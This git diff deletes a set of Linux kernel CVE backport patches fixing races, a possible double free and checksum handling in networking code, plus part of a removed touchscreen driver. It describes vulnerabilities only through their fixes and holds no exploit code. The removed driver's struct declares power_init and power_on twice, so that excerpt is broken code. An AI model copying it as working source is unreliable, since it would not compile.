- 		skb->sk = sk;
-+		skb->destructor = sock_efree;
- 	}
- 	if (!sock_owned_by_user(sk))
- 		llc_conn_rcv(sk, skb);
-diff --git a/net/llc/llc_sap.c b/net/llc/llc_sap.c
-index d0e1e80..5404d0d 100644
---- a/net/llc/llc_sap.c
-+++ b/net/llc/llc_sap.c
-@@ -290,7 +290,10 @@ static void llc_sap_rcv(struct llc_sap *sap, struct sk_buff *skb,
- 
- 	ev->type   = LLC_SAP_EV_TYPE_PDU;
- 	ev->reason = 0;
-+	skb_orphan(skb);
-+	sock_hold(sk);
- 	skb->sk = sk;
-+	skb->destructor = sock_efree;
- 	llc_sap_state_process(sap, skb);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch
deleted file mode 100644
index 665dc9ea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index 05cfee7..2ae5ae2 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -1429,13 +1429,16 @@
- 		return -EINVAL;
- 	}
- 
--	if (!po->running)
--		return -EINVAL;
--
--	if (po->fanout)
--		return -EALREADY;
--
- 	mutex_lock(&fanout_mutex);
-+
-+	err = -EINVAL;
-+	if (!po->running)
-+		goto out;
-+
-+	err = -EALREADY;
-+	if (po->fanout)
-+		goto out;
-+
- 	match = NULL;
- 	list_for_each_entry(f, &fanout_list, list) {
- 		if (f->id == id &&
-@@ -1491,17 +1494,16 @@
- 	struct packet_sock *po = pkt_sk(sk);
- 	struct packet_fanout *f;
- 
--	f = po->fanout;
--	if (!f)
--		return;
--
- 	mutex_lock(&fanout_mutex);
--	po->fanout = NULL;
-+	f = po->fanout;
-+	if (f) {
-+		po->fanout = NULL;
- 
--	if (atomic_dec_and_test(&f->sk_ref)) {
--		list_del(&f->list);
--		dev_remove_pack(&f->prot_hook);
--		kfree(f);
-+		if (atomic_dec_and_test(&f->sk_ref)) {
-+			list_del(&f->list);
-+			dev_remove_pack(&f->prot_hook);
-+			kfree(f);
-+		}
- 	}
- 	mutex_unlock(&fanout_mutex);
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64
deleted file mode 100644
index 57eacd49..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL25ldC9wYWNrZXQvYWZfcGFja2V0LmMgYi9uZXQvcGFja2V0L2FmX3BhY2tldC5jCmluZGV4IDA1Y2ZlZTcuLjJhZTVhZTIgMTAwNjQ0Ci0tLSBhL25ldC9wYWNrZXQvYWZfcGFja2V0LmMKKysrIGIvbmV0L3BhY2tldC9hZl9wYWNrZXQuYwpAQCAtMTQyOSwxMyArMTQyOSwxNiBAQAogCQlyZXR1cm4gLUVJTlZBTDsKIAl9CiAKLQlpZiAoIXBvLT5ydW5uaW5nKQotCQlyZXR1cm4gLUVJTlZBTDsKLQotCWlmIChwby0+ZmFub3V0KQotCQlyZXR1cm4gLUVBTFJFQURZOwotCiAJbXV0ZXhfbG9jaygmZmFub3V0X211dGV4KTsKKworCWVyciA9IC1FSU5WQUw7CisJaWYgKCFwby0+cnVubmluZykKKwkJZ290byBvdXQ7CisKKwllcnIgPSAtRUFMUkVBRFk7CisJaWYgKHBvLT5mYW5vdXQpCisJCWdvdG8gb3V0OworCiAJbWF0Y2ggPSBOVUxMOwogCWxpc3RfZm9yX2VhY2hfZW50cnkoZiwgJmZhbm91dF9saXN0LCBsaXN0KSB7CiAJCWlmIChmLT5pZCA9PSBpZCAmJgpAQCAtMTQ5MSwxNyArMTQ5NCwxNiBAQAogCXN0cnVjdCBwYWNrZXRfc29jayAqcG8gPSBwa3Rfc2soc2spOwogCXN0cnVjdCBwYWNrZXRfZmFub3V0ICpmOwogCi0JZiA9IHBvLT5mYW5vdXQ7Ci0JaWYgKCFmKQotCQlyZXR1cm47Ci0KIAltdXRleF9sb2NrKCZmYW5vdXRfbXV0ZXgpOwotCXBvLT5mYW5vdXQgPSBOVUxMOworCWYgPSBwby0+ZmFub3V0OworCWlmIChmKSB7CisJCXBvLT5mYW5vdXQgPSBOVUxMOwogCi0JaWYgKGF0b21pY19kZWNfYW5kX3Rlc3QoJmYtPnNrX3JlZikpIHsKLQkJbGlzdF9kZWwoJmYtPmxpc3QpOwotCQlkZXZfcmVtb3ZlX3BhY2soJmYtPnByb3RfaG9vayk7Ci0JCWtmcmVlKGYpOworCQlpZiAoYXRvbWljX2RlY19hbmRfdGVzdCgmZi0+c2tfcmVmKSkgeworCQkJbGlzdF9kZWwoJmYtPmxpc3QpOworCQkJZGV2X3JlbW92ZV9wYWNrKCZmLT5wcm90X2hvb2spOworCQkJa2ZyZWUoZik7CisJCX0KIAl9CiAJbXV0ZXhfdW5sb2NrKCZmYW5vdXRfbXV0ZXgpOwogfQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch b/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch
deleted file mode 100644
index c92194d5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch
+++ /dev/null
@@ -1,126 +0,0 @@
-From d199fab63c11998a602205f7ee7ff7c05c97164b Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Tue, 14 Feb 2017 09:03:51 -0800
-Subject: packet: fix races in fanout_add()
-
-Multiple threads can call fanout_add() at the same time.
-
-We need to grab fanout_mutex earlier to avoid races that could
-lead to one thread freeing po->rollover that was set by another thread.
-
-Do the same in fanout_release(), for peace of mind, and to help us
-finding lockdep issues earlier.
-
-Fixes: dc99f600698d ("packet: Add fanout support.")
-Fixes: 0648ab70afe6 ("packet: rollover prepare: per-socket state")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Cc: Willem de Bruijn <willemb@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/packet/af_packet.c | 55 +++++++++++++++++++++++++++-----------------------
- 1 file changed, 30 insertions(+), 25 deletions(-)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index d56ee46..0f03f6a 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -1619,6 +1619,7 @@ static void fanout_release_data(struct packet_fanout *f)
- 
- static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- {
-+	struct packet_rollover *rollover = NULL;
- 	struct packet_sock *po = pkt_sk(sk);
- 	struct packet_fanout *f, *match;
- 	u8 type = type_flags & 0xff;
-@@ -1641,23 +1642,28 @@ static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- 		return -EINVAL;
- 	}
- 
-+	mutex_lock(&fanout_mutex);
-+
-+	err = -EINVAL;
- 	if (!po->running)
--		return -EINVAL;
-+		goto out;
- 
-+	err = -EALREADY;
- 	if (po->fanout)
--		return -EALREADY;
-+		goto out;
- 
- 	if (type == PACKET_FANOUT_ROLLOVER ||
- 	    (type_flags & PACKET_FANOUT_FLAG_ROLLOVER)) {
--		po->rollover = kzalloc(sizeof(*po->rollover), GFP_KERNEL);
--		if (!po->rollover)
--			return -ENOMEM;
--		atomic_long_set(&po->rollover->num, 0);
--		atomic_long_set(&po->rollover->num_huge, 0);
--		atomic_long_set(&po->rollover->num_failed, 0);
-+		err = -ENOMEM;
-+		rollover = kzalloc(sizeof(*rollover), GFP_KERNEL);
-+		if (!rollover)
-+			goto out;
-+		atomic_long_set(&rollover->num, 0);
-+		atomic_long_set(&rollover->num_huge, 0);
-+		atomic_long_set(&rollover->num_failed, 0);
-+		po->rollover = rollover;
- 	}
- 
--	mutex_lock(&fanout_mutex);
- 	match = NULL;
- 	list_for_each_entry(f, &fanout_list, list) {
- 		if (f->id == id &&
-@@ -1704,11 +1710,11 @@ static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- 		}
- 	}
- out:
--	mutex_unlock(&fanout_mutex);
--	if (err) {
--		kfree(po->rollover);
-+	if (err && rollover) {
-+		kfree(rollover);
- 		po->rollover = NULL;
- 	}
-+	mutex_unlock(&fanout_mutex);
- 	return err;
- }
- 
-@@ -1717,23 +1723,22 @@ static void fanout_release(struct sock *sk)
- 	struct packet_sock *po = pkt_sk(sk);
- 	struct packet_fanout *f;
- 
--	f = po->fanout;
--	if (!f)
--		return;
--
- 	mutex_lock(&fanout_mutex);
--	po->fanout = NULL;
-+	f = po->fanout;
-+	if (f) {
-+		po->fanout = NULL;
-+
-+		if (atomic_dec_and_test(&f->sk_ref)) {
-+			list_del(&f->list);
-+			dev_remove_pack(&f->prot_hook);
-+			fanout_release_data(f);
-+			kfree(f);
-+		}
- 
--	if (atomic_dec_and_test(&f->sk_ref)) {
--		list_del(&f->list);
--		dev_remove_pack(&f->prot_hook);
--		fanout_release_data(f);
--		kfree(f);
-+		if (po->rollover)
-+			kfree_rcu(po->rollover, rcu);
- 	}
- 	mutex_unlock(&fanout_mutex);
--
--	if (po->rollover)
--		kfree_rcu(po->rollover, rcu);
- }
- 
- static bool packet_extra_vlan_len_allowed(const struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch
deleted file mode 100644
index e0251c6e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From ca4ef4574f1ee5252e2cd365f8f5d5bafd048f32 Mon Sep 17 00:00:00 2001
-From: Paolo Abeni <pabeni@redhat.com>
-Date: Tue, 21 Feb 2017 09:33:18 +0100
-Subject: ip: fix IP_CHECKSUM handling
-
-The skbs processed by ip_cmsg_recv() are not guaranteed to
-be linear e.g. when sending UDP packets over loopback with
-MSGMORE.
-Using csum_partial() on [potentially] the whole skb len
-is dangerous; instead be on the safe side and use skb_checksum().
-
-Thanks to syzkaller team to detect the issue and provide the
-reproducer.
-
-v1 -> v2:
- - move the variable declaration in a tighter scope
-
-Fixes: ad6f939ab193 ("ip: Add offset parameter to ip_cmsg_recv")
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Paolo Abeni <pabeni@redhat.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ip_sockglue.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
-index ce1386a..ebd953b 100644
---- a/net/ipv4/ip_sockglue.c
-+++ b/net/ipv4/ip_sockglue.c
-@@ -116,10 +116,10 @@ static void ip_cmsg_recv_checksum(struct msghdr *msg, struct sk_buff *skb,
- 	if (skb->ip_summed != CHECKSUM_COMPLETE)
- 		return;
- 
--	if (offset != 0)
--		csum = csum_sub(csum,
--				csum_partial(skb_transport_header(skb) + tlen,
--					     offset, 0));
-+	if (offset != 0) {
-+		int tend_off = skb_transport_offset(skb) + tlen;
-+		csum = csum_sub(csum, skb_checksum(skb, tend_off, offset, 0));
-+	}
- 
- 	put_cmsg(msg, SOL_IP, IP_CHECKSUM, sizeof(__wsum), &csum);
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch
deleted file mode 100644
index edc7e72f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6348/^4.9/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 4c03b862b12f980456f9de92db6d508a4999b788 Mon Sep 17 00:00:00 2001
-From: "David S. Miller" <davem@davemloft.net>
-Date: Fri, 17 Feb 2017 16:19:39 -0500
-Subject: irda: Fix lockdep annotations in hashbin_delete().
-
-A nested lock depth was added to the hasbin_delete() code but it
-doesn't actually work some well and results in tons of lockdep splats.
-
-Fix the code instead to properly drop the lock around the operation
-and just keep peeking the head of the hashbin queue.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/irda/irqueue.c | 34 ++++++++++++++++------------------
- 1 file changed, 16 insertions(+), 18 deletions(-)
-
-diff --git a/net/irda/irqueue.c b/net/irda/irqueue.c
-index acbe61c..160dc89 100644
---- a/net/irda/irqueue.c
-+++ b/net/irda/irqueue.c
-@@ -383,9 +383,6 @@ EXPORT_SYMBOL(hashbin_new);
-  *    for deallocating this structure if it's complex. If not the user can
-  *    just supply kfree, which should take care of the job.
-  */
--#ifdef CONFIG_LOCKDEP
--static int hashbin_lock_depth = 0;
--#endif
- int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- {
- 	irda_queue_t* queue;
-@@ -396,22 +393,27 @@ int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- 	IRDA_ASSERT(hashbin->magic == HB_MAGIC, return -1;);
- 
- 	/* Synchronize */
--	if ( hashbin->hb_type & HB_LOCK ) {
--		spin_lock_irqsave_nested(&hashbin->hb_spinlock, flags,
--					 hashbin_lock_depth++);
--	}
-+	if (hashbin->hb_type & HB_LOCK)
-+		spin_lock_irqsave(&hashbin->hb_spinlock, flags);
- 
- 	/*
- 	 *  Free the entries in the hashbin, TODO: use hashbin_clear when
- 	 *  it has been shown to work
- 	 */
- 	for (i = 0; i < HASHBIN_SIZE; i ++ ) {
--		queue = dequeue_first((irda_queue_t**) &hashbin->hb_queue[i]);
--		while (queue ) {
--			if (free_func)
--				(*free_func)(queue);
--			queue = dequeue_first(
--				(irda_queue_t**) &hashbin->hb_queue[i]);
-+		while (1) {
-+			queue = dequeue_first((irda_queue_t**) &hashbin->hb_queue[i]);
-+
-+			if (!queue)
-+				break;
-+
-+			if (free_func) {
-+				if (hashbin->hb_type & HB_LOCK)
-+					spin_unlock_irqrestore(&hashbin->hb_spinlock, flags);
-+				free_func(queue);
-+				if (hashbin->hb_type & HB_LOCK)
-+					spin_lock_irqsave(&hashbin->hb_spinlock, flags);
-+			}
- 		}
- 	}
- 
-@@ -420,12 +422,8 @@ int hashbin_delete( hashbin_t* hashbin, FREE_FUNC free_func)
- 	hashbin->magic = ~HB_MAGIC;
- 
- 	/* Release lock */
--	if ( hashbin->hb_type & HB_LOCK) {
-+	if (hashbin->hb_type & HB_LOCK)
- 		spin_unlock_irqrestore(&hashbin->hb_spinlock, flags);
--#ifdef CONFIG_LOCKDEP
--		hashbin_lock_depth--;
--#endif
--	}
- 
- 	/*
- 	 *  Free the hashbin structure
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch
deleted file mode 100644
index a4a77489..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6353/^4.10/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From dfcb9f4f99f1e9a49e43398a7bfbf56927544af1 Mon Sep 17 00:00:00 2001
-From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Date: Thu, 23 Feb 2017 09:31:18 -0300
-Subject: sctp: deny peeloff operation on asocs with threads sleeping on it
-
-commit 2dcab5984841 ("sctp: avoid BUG_ON on sctp_wait_for_sndbuf")
-attempted to avoid a BUG_ON call when the association being used for a
-sendmsg() is blocked waiting for more sndbuf and another thread did a
-peeloff operation on such asoc, moving it to another socket.
-
-As Ben Hutchings noticed, then in such case it would return without
-locking back the socket and would cause two unlocks in a row.
-
-Further analysis also revealed that it could allow a double free if the
-application managed to peeloff the asoc that is created during the
-sendmsg call, because then sctp_sendmsg() would try to free the asoc
-that was created only for that call.
-
-This patch takes another approach. It will deny the peeloff operation
-if there is a thread sleeping on the asoc, so this situation doesn't
-exist anymore. This avoids the issues described above and also honors
-the syscalls that are already being handled (it can be multiple sendmsg
-calls).
-
-Joint work with Xin Long.
-
-Fixes: 2dcab5984841 ("sctp: avoid BUG_ON on sctp_wait_for_sndbuf")
-Cc: Alexander Popov <alex.popov@linux.com>
-Cc: Ben Hutchings <ben@decadent.org.uk>
-Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
-Signed-off-by: Xin Long <lucien.xin@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/sctp/socket.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/net/sctp/socket.c b/net/sctp/socket.c
-index b532148..465a9c8 100644
---- a/net/sctp/socket.c
-+++ b/net/sctp/socket.c
-@@ -4862,6 +4862,12 @@ int sctp_do_peeloff(struct sock *sk, sctp_assoc_t id, struct socket **sockp)
- 	if (!asoc)
- 		return -EINVAL;
- 
-+	/* If there is a thread waiting on more sndbuf space for
-+	 * sending on this asoc, it cannot be peeled.
-+	 */
-+	if (waitqueue_active(&asoc->wait))
-+		return -EBUSY;
-+
- 	/* An association cannot be branched off from an already peeled-off
- 	 * socket, nor is this supported for tcp style sockets.
- 	 */
-@@ -7599,8 +7605,6 @@ static int sctp_wait_for_sndbuf(struct sctp_association *asoc, long *timeo_p,
- 		 */
- 		release_sock(sk);
- 		current_timeo = schedule_timeout(current_timeo);
--		if (sk != asoc->base.sk)
--			goto do_error;
- 		lock_sock(sk);
- 
- 		*timeo_p = current_timeo;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch
deleted file mode 100644
index 0b4c4ae4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6421/ANY/0001.patch
+++ /dev/null
@@ -1,2398 +0,0 @@
-From be42c7ff1f0396484882451fd18f47144c8f1b6b Mon Sep 17 00:00:00 2001
-From: Shantanu Jain <shjain@codeaurora.org>
-Date: Thu, 16 Feb 2017 11:39:44 +0530
-Subject: input: touchscreen: remove msg21xx mstar touch driver
-
-Remove msg21xx mstar touch driver from the kernel code
-as it has never been used in any of the recent platforms.
-
-Change-Id: I0ac1f93d9736c402732b6c4a8d22b1bf3500e4c4
-Signed-off-by: Vevek Venkatesan <vevekv@codeaurora.org>
-Signed-off-by: Shantanu Jain <shjain@codeaurora.org>
----
- .../bindings/input/touchscreen/msg21xx-ts.txt      |   71 -
- drivers/input/touchscreen/Kconfig                  |   11 -
- drivers/input/touchscreen/Makefile                 |    1 -
- drivers/input/touchscreen/msg21xx_ts.c             | 2260 --------------------
- 4 files changed, 2343 deletions(-)
- delete mode 100644 Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt
- delete mode 100644 drivers/input/touchscreen/msg21xx_ts.c
-
-diff --git a/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt b/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt
-deleted file mode 100644
-index 7315aef..0000000
---- a/Documentation/devicetree/bindings/input/touchscreen/msg21xx-ts.txt
-+++ /dev/null
-@@ -1,71 +0,0 @@
--Mstar touch controller
--
--The mstar controller is connected to host processor
--via i2c. The controller generates interrupts when the
--user touches the panel. The host controller is expected
--to read the touch coordinates over i2c and pass the coordinates
--to the rest of the system.
--
--Required properties:
--
-- - compatible		: should be "mstar,msg21xx".
-- - reg			: i2c slave address of the device.
-- - interrupt-parent	: parent of interrupt.
-- - interrupts		: touch sample interrupt to indicate presense or release
--				of fingers on the panel.
-- - vdd-supply		: Power supply needed to power up the device.
-- - vcc_i2c-supply	: Power source required to power up i2c bus.
-- - mstar,irq-gpio	: irq gpio which is to provide interrupts to host,
--				same as "interrupts" node. It will also
--				contain active low or active high information.
-- - mstar,reset-gpio	: reset gpio to control the reset of chip.
-- - mstar,display-coords : display coords in pixels. It is a four
--				tuple consisting of min x, min y, max x and
--				max y values.
-- - pinctrl-names : This should be defined if a target uses pinctrl framework.
--			See "pinctrl" in Documentation/devicetree/bindings/pinctrl/msm-pinctrl.txt.
--			Specify the names of the configs that pinctrl can install in driver.
--			Following are the pinctrl configs that can be installed:
--			"pmx_ts_active" : Active configuration of pins, this should specify active
--			config defined in pin groups of interrupt and reset gpio.
--			"pmx_ts_suspend" : Disabled configuration of pins, this should specify sleep
--			config defined in pin groups of interrupt and reset gpio.
--			"pmx_ts_release" : Release configuration of pins, this should specify
--			release config defined in pin groups of interrupt and reset gpio.
-- - mstar,num-max-touches: It defines the maximum number of touch supported by the controller.
-- - mstar,hard-reset-delay-ms : hard reset delay in ms
-- - mstar,post-hard-reset-delay-ms : post hard reset delay in ms
--
--Optional properties:
--
-- - mstar,button-map : button map of key codes. It is a three tuple consisting of key codes.
-- - mstar,panel-coords : panel coords for the chip in pixels.
--				It is a four tuple consisting of min x,
--				min y, max x and max y values.
-- - mstar,ic-type : It defines the ic-type of the controller. Values are as folows:
--			1 -> msg2133.
--			2 -> msg21xxA.
--			3 -> msg26xxM.
--
--Example:
--	i2c@78b9000 { /* BLSP1 QUP5 */
--		mstar@26 {
--			compatible = "mstar,msg21xx";
--			reg = <0x26>;
--			interrupt-parent = <&msm_gpio>;
--			interrupts = <13 0x2008>;
--			mstar,irq-gpio = <&msm_gpio 13 0x00000001>;
--			mstar,reset-gpio = <&msm_gpio 12 0x0>;
--			vdd-supply = <&pm8916_l17>;
--			vcc_i2c-supply = <&pm8916_l6>;
--			mstar,display-coords = <0 0 480 854>;
--			pinctrl-names = "pmx_ts_active","pmx_ts_suspend";
--			pinctrl-0 = <&ts_int_active &ts_reset_active>;
--			pinctrl-1 = <&ts_int_suspend &ts_reset_suspend>;
--			mstar,button-map = <172 139 158>;
--			mstar,ic-type = <2>;
--			mstar,num_max_touches = <2>;
--			mstar,hard-reset-delay-ms = <100>;
--			mstar,post-hard-reset-delay-ms = <100>;
--		};
--	};
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index 49df5e0..9044bb5 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1128,17 +1128,6 @@ config TOUCHSCREEN_FT5X06_GESTURE
- 
-          If unsure, say N.
- 
--config TOUCHSCREEN_MSTAR21XX
--	tristate "Mstar touchscreens"
--	depends on I2C
--	help
--	 Say Y here if you have a mstar touchscreen.
--
--	 If unsure, say N.
--
--	 To compile this driver as a module, choose M here: the
--	 module will be called msg21xx_ts.
--
- config TOUCHSCREEN_ROHM_BU21023
- 	tristate "ROHM BU21023/24 Dual touch support resistive touchscreens"
- 	depends on I2C
-diff --git a/drivers/input/touchscreen/Makefile b/drivers/input/touchscreen/Makefile
-index 06953a6..1b6844b 100644
---- a/drivers/input/touchscreen/Makefile
-+++ b/drivers/input/touchscreen/Makefile
-@@ -98,5 +98,4 @@ obj-$(CONFIG_TOUCHSCREEN_TPS6507X)	+= tps6507x-ts.o
- obj-$(CONFIG_TOUCHSCREEN_ZFORCE)	+= zforce_ts.o
- obj-$(CONFIG_TOUCHSCREEN_COLIBRI_VF50)	+= colibri-vf50-ts.o
- obj-$(CONFIG_TOUCHSCREEN_ROHM_BU21023)	+= rohm_bu21023.o
--obj-$(CONFIG_TOUCHSCREEN_MSTAR21XX)	+= msg21xx_ts.o
- obj-$(CONFIG_TOUCHSCREEN_GT9XX)		+= gt9xx/
-diff --git a/drivers/input/touchscreen/msg21xx_ts.c b/drivers/input/touchscreen/msg21xx_ts.c
-deleted file mode 100644
-index fe8c6e164..0000000
---- a/drivers/input/touchscreen/msg21xx_ts.c
-+++ /dev/null
-@@ -1,2260 +0,0 @@
--/*
-- * MStar MSG21XX touchscreen driver
-- *
-- * Copyright (c) 2006-2012 MStar Semiconductor, Inc.
-- *
-- * Copyright (C) 2012 Bruce Ding <bruce.ding@mstarsemi.com>
-- *
-- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License as published by
-- * the Free Software Foundation; either version 2 of the License, or
-- * (at your option) any later version.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/module.h>
--#include <linux/kernel.h>
--#include <linux/input.h>
--#include <linux/input/mt.h>
--#include <linux/interrupt.h>
--#include <linux/i2c.h>
--#include <linux/gpio.h>
--#include <linux/of_gpio.h>
--#include <linux/sysfs.h>
--#include <linux/init.h>
--#include <linux/mutex.h>
--#include <linux/delay.h>
--#include <linux/firmware.h>
--#include <linux/debugfs.h>
--#include <linux/regulator/consumer.h>
--
--#if defined(CONFIG_FB)
--#include <linux/notifier.h>
--#include <linux/fb.h>
--#endif
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--#include <linux/input/vir_ps.h>
--#endif
--
--/* Macro Definition */
--
--#define TOUCH_DRIVER_DEBUG 0
--#if (TOUCH_DRIVER_DEBUG == 1)
--#define DBG(fmt, arg...) pr_info(fmt, ##arg)
--#else
--#define DBG(fmt, arg...)
--#endif
--
--/* Constant Value & Variable Definition */
--
--#define MSTAR_VTG_MIN_UV	2800000
--#define MSTAR_VTG_MAX_UV	3300000
--#define MSTAR_I2C_VTG_MIN_UV	1800000
--#define MSTAR_I2C_VTG_MAX_UV	1800000
--
--#define MAX_BUTTONS		4
--#define FT_COORDS_ARR_SIZE	4
--#define MSTAR_FW_NAME_MAX_LEN	50
--
--#define MSTAR_CHIPTOP_REGISTER_BANK	0x1E
--#define MSTAR_CHIPTOP_REGISTER_ICTYPE 0xCC
--#define MSTAR_INIT_SW_ID 0x7FF
--#define MSTAR_DEBUG_DIR_NAME "ts_debug"
--
--#define MSG_FW_FILE_MAJOR_VERSION(x) \
--	(((x)->data[0x7f4f] << 8) + ((x)->data[0x7f4e]))
--
--#define MSG_FW_FILE_MINOR_VERSION(x) \
--	(((x)->data[0x7f51] << 8) + ((x)->data[0x7f50]))
--
--/*
-- * Note.
-- * Please do not change the below setting.
-- */
--#define TPD_WIDTH   (2048)
--#define TPD_HEIGHT  (2048)
--
--#ifdef FIRMWARE_AUTOUPDATE
--enum {
--	SWID_START = 1,
--	SWID_TRULY = SWID_START,
--	SWID_NULL,
--};
--
--static unsigned char MSG_FIRMWARE[1][33*1024] = { {
--		#include "msg21xx_truly_update_bin.h"
--	}
--};
--#endif
--
--#define CONFIG_TP_HAVE_KEY
--#define PINCTRL_STATE_ACTIVE	"pmx_ts_active"
--#define PINCTRL_STATE_SUSPEND	"pmx_ts_suspend"
--#define PINCTRL_STATE_RELEASE	"pmx_ts_release"
--
--#define SLAVE_I2C_ID_DBBUS		 (0xC4>>1)
--
--#define DEMO_MODE_PACKET_LENGTH	(8)
--
--#define TP_PRINT
--
--static char *fw_version; /* customer firmware version */
--static unsigned short fw_version_major;
--static unsigned short fw_version_minor;
--static unsigned char temp[94][1024];
--static unsigned int crc32_table[256];
--
--static unsigned short fw_file_major, fw_file_minor;
--static unsigned short main_sw_id = MSTAR_INIT_SW_ID;
--static unsigned short info_sw_id = MSTAR_INIT_SW_ID;
--static unsigned int bin_conf_crc32;
--
--struct msg21xx_ts_platform_data {
--	const char *name;
--	char fw_name[MSTAR_FW_NAME_MAX_LEN];
--	u8 fw_version_major;
--	u8 fw_version_minor;
--	u32 irq_gpio;
--	u32 irq_gpio_flags;
--	u32 reset_gpio;
--	u32 reset_gpio_flags;
--	u32 x_max;
--	u32 y_max;
--	u32 x_min;
--	u32 y_min;
--	u32 panel_minx;
--	u32 panel_miny;
--	u32 panel_maxx;
--	u32 panel_maxy;
--	u32 num_max_touches;
--	bool no_force_update;
--	bool i2c_pull_up;
--	bool ignore_id_check;
--	int (*power_init)(bool);
--	int (*power_on)(bool);
--	int (*power_init)(bool);
--	int (*power_on)(bool);
--	u8 ic_type;
--	u32 button_map[MAX_BUTTONS];
--	u32 num_buttons;
--	u32 hard_reset_delay_ms;
--	u32 post_hard_reset_delay_ms;
--	bool updating_fw;
--};
--
--/* Touch Data Type Definition */
--struct touchPoint_t {
--	unsigned short x;
--	unsigned short y;
--};
--
--struct touchInfo_t {
--	struct touchPoint_t *point;
--	unsigned char count;
--	unsigned char keycode;
--};
--
--struct msg21xx_ts_data {
--	struct i2c_client *client;
--	struct input_dev *input_dev;
--	struct msg21xx_ts_platform_data *pdata;
--	struct regulator *vdd;
--	struct regulator *vcc_i2c;
--	bool suspended;
--#if defined(CONFIG_FB)
--	struct notifier_block fb_notif;
--#endif
--	struct pinctrl *ts_pinctrl;
--	struct pinctrl_state *pinctrl_state_active;
--	struct pinctrl_state *pinctrl_state_suspend;
--	struct pinctrl_state *pinctrl_state_release;
--	struct mutex ts_mutex;
--	struct touchInfo_t info;
--};
--
--#if defined(CONFIG_FB)
--static int fb_notifier_callback(struct notifier_block *self,
--			unsigned long event, void *data);
--#endif
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--static unsigned char bEnableTpProximity;
--static unsigned char bFaceClosingTp;
--#endif
--
--#ifdef TP_PRINT
--static int tp_print_proc_read(struct msg21xx_ts_data *ts_data);
--static void tp_print_create_entry(struct msg21xx_ts_data *ts_data);
--#endif
--
--static void _ReadBinConfig(struct msg21xx_ts_data *ts_data);
--static unsigned int _CalMainCRC32(struct msg21xx_ts_data *ts_data);
--
--static struct mutex msg21xx_mutex;
--
--enum EMEM_TYPE_t {
